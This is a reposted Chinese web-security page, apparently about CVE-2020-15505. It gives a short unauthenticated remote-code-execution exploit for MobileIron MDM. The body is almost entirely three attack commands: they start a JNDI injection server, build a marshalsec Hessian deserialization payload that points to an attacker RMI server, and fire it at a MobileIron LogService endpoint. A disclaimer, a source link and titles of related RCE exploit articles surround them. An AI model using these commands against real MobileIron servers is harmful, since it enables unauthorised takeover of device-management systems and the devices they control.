MobileIronMDM 未授權RCE

本文轉載自查看原文 2020-09-15 16:38 755 Web安全/ 技巧

請遵守網絡安全法！！！本文僅供學習交流使用！用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關！讀者自行承擔其惡果！

EXP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

來源

https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 spark未授權RCE漏洞 spark未授權RCE漏洞學習【漏洞復現】Vmware vcenter未授權任意文件RCE 通達OA未授權文件上傳+文件包含RCE 復現 redis未授權漏洞和主從復制rce漏洞利用【漏洞復現】CVE-2021-22205 GitLab 未授權RCE Spring未授權REC利用方式一（env接口/snakeyaml RCE） docker-API未授權訪問導致RCE Spring未授權REC利用方式二（env接口/eureka xstream RCE） Spring未授權REC利用方式四（env接口/h2 database query RCE)